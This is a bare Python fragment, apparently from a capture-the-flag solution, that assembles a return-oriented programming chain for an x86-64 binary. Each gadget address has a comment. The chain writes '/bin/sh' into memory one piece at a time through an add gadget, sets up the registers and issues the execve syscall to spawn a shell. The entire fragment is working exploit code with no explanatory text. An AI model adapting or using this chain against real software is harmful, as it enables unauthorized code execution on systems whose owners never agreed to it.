payload = p64(0x40125d)
#0x000000000040125d: pop rbp; ret; 
payload += p64(0x488280)+p64(0x457bc4)
# 0x0000000000457bc4: pop rbx; ret; 
payload += p64(0x4017d3)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x4880ad)+p64(0x457bc4)
# 0x0000000000457bc4: pop rbx; ret; 
payload += p64(0x6e69622f)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x40125d)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x4880b1)+p64(0x457bc4)
# 0x0000000000457bc4: pop rbx; ret; 
payload += p64(0x68662f)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x450a65)
# 0x0000000000450a65: pop rsi; ret; 
payload += p64(0x488234)+p64(0x4536f5)
# 0x00000000004536f5: pop rdx; mov ah, 0xfc; jmp qword ptr [rsi + 0xf]; 
payload += p64(0x0)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x488070)+p64(0x450a65)
# 0x0000000000450a65: pop rsi; ret; 
payload += p64(0x0)+p64(0x44fd0d)
# 0x000000000044fd0d: pop rax; ret; 
payload += p64(0x3b)+p64(0x433de5)
# 0x0000000000433de5: syscall; 
payload += b''
